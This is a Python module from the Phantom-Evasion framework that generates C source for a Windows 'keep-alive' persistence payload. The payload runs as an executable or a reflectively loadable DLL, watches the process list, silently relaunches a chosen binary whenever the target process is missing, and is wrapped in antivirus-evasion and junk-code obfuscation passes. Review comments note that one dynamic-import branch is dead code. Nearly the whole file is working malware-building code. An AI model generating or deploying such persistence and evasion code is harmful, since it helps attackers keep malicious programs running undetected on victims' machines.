
     ########################################################################################
     #                                                                                      #
     #    This file is part of Phantom-Evasion.                                             #
     #                                                                                      #
     #    Phantom-Evasion is free software: you can redistribute it and/or modify           #
     #    it under the terms of the GNU General Public License as published by              #
     #    the Free Software Foundation, either version 3 of the License, or                 #
     #    (at your option) any later version.                                               #
     #                                                                                      #
     #    Phantom-Evasion is distributed in the hope that it will be useful,                #
     #    but WITHOUT ANY WARRANTY; without even the implied warranty of                    #
     #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                     #
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys 
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import JunkInjector
from usefull import WindowsDefend
from usefull import IncludeShuffler
from usefull import WindowsDecoyProc
from usefull import CloseDecoyProc
from usefull import WriteSource
 
def Persistence_C_KeepAliveProcess_windows(ModOpt: dict) -> None:
    """Generate the C source for the Windows "keep-alive process" persistence module.

    This function only assembles a C source string and hands it to
    WriteSource("Source.c"); it compiles and executes nothing itself.  The
    emitted program loops forever: each pass takes a Toolhelp process
    snapshot, walks it comparing every szExeFile against ModOpt["ProcTarget"],
    calls WinExec on ModOpt["Binpath"] (uCmdShow 0) when no match was seen,
    then calls Sleep(ModOpt["Timevar"]) before the next pass.

    Args:
        ModOpt: module option dict.  Keys read: "Binpath", "ProcTarget",
            "Timevar", "Outformat" ("exe" or "dll"), "Reflective", "DynImport",
            "JI", "JF", "EF", "JR".  Keys written (only when "DynImport" is
            True): "NtdllHandle", "Ker32Handle" -- the caller's dict is mutated.

    Returns:
        None.  Side effect: WriteSource("Source.c", generated_source).

    Notes for reviewers / analysts:
        * "ProcTarget", "Binpath" and "Timevar" are spliced into C string
          literals and expressions verbatim -- no escaping, no type
          conversion -- so they are present as plaintext in the generated
          source and in any binary built from it.
        * The "DynImport" True branch is currently dead code: it references
          RandProcsnapshot and Randentry, which are never assigned in this
          function, so Python raises NameError before any source is written.
        * Output is wrapped in main() for "exe", or in DllMain's
          DLL_PROCESS_ATTACH branch for "dll".  WindowsDefend(ModOpt) output
          sits between the "$:START" and "$:EVA" markers, and JunkInjector
          is run over the whole body before the closing braces are appended.
    """

    FilePath = ModOpt["Binpath"]
    Procname = ModOpt["ProcTarget"]
    # Concatenated straight into "Sleep(...)" below, so this is expected to
    # already be a str -- TODO confirm with the option parser.
    WaitBeforeCheck = ModOpt["Timevar"]
    # Randomised C identifiers for the found-flag, the PROCESSENTRY32 and the
    # snapshot handle; varname_creator() is an external helper (not shown here).
    RandBool= varname_creator()
    RandEntry = varname_creator()
    RandHandle = varname_creator()

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n","#include <tlhelp32.h>\n"]

    # IncludeShuffler is external; presumably it only reorders the includes -- confirm.
    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"
        
        # For a DLL the loop below runs inside DllMain on DLL_PROCESS_ATTACH;
        # the matching braces are appended after JunkInjector at the bottom.
        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # "$:START" / "$:EVA" / "$:END" are section markers; presumably consumed by
    # JunkInjector or a later pass -- TODO confirm, they are not C.
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    # Unbounded loop: one snapshot + compare + optional relaunch per pass.
    Ret_code += "while (TRUE){\n"
    Ret_code += "BOOL " + RandBool + " = FALSE;\n"
    Ret_code += "PROCESSENTRY32 " + RandEntry + ";\n"
    Ret_code +=  RandEntry + ".dwSize = sizeof(PROCESSENTRY32);\n"

    
    if ModOpt["DynImport"] == True:

        # Written back into the caller's ModOpt (mutation).  NtdllHandle is
        # declared in the generated C but never referenced in this function.
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # NOTE(review): this branch is unreachable in practice -- RandProcsnapshot
    # (used below) and Randentry (distinct from RandEntry) are never assigned,
    # so the first use raises NameError.  Even as emitted, the API names
    # stay in the source as plaintext string literals passed to GetProcAddress,
    # the snapshot handle is never closed, and the "while (TRUE){" opened
    # above is not closed on this path.
    if ModOpt["DynImport"] == True:

        NdcTl32Snapshot = varname_creator()
        NdcProcess32First = varname_creator()
        NdcProcess32Next = varname_creator()
        NdcOpenProcess = varname_creator()
        NdcWinExec = varname_creator()

        Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
        Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
        Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32First\");\n"
        Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32Next\");\n"
        Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenProcess\");\n"
        Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "FARPROC " + NdcWinExec + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WinExec\");\n"
        Ret_code += "if (" + RandBool + " == FALSE ){" + NdcWinExec + "(\"" + FilePath + "\",0);}}\n"
    else:

        # Statically-linked path (the one that actually works): the Toolhelp
        # and WinExec calls appear in the import table, and Procname /
        # FilePath are embedded verbatim in the string literals below.
        Ret_code += "HANDLE " + RandHandle + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);\n"
        Ret_code += "if (Process32First(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}\n"
        Ret_code += "while (Process32Next(" + RandHandle + ", &" + RandEntry + ")){\n"
        Ret_code += "if (strcmp(" + RandEntry + ".szExeFile, \"" + Procname + "\") == 0){" + RandBool + " = TRUE;}}\n"
        Ret_code += "CloseHandle(" + RandHandle + ");\n"
        # Relaunch (uCmdShow 0) only when no szExeFile matched; the relaunch
        # is skipped entirely if Process32First fails.
        Ret_code += "if (" + RandBool + " == FALSE ){WinExec(\"" + FilePath + "\",0);}}\n"
        
    # Closes "while (TRUE){" (on the static path).
    Ret_code += "Sleep(" + WaitBeforeCheck + ");}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # External pass over the whole body; the JI/JF/EF/JR options are passed
    # through untouched -- their semantics are not visible here.
    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        # Close the DLL_PROCESS_ATTACH block, then DllMain.
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    # Fixed output filename; the caller is expected to pick it up from the
    # working directory -- confirm against the build step.
    WriteSource("Source.c",Ret_code)




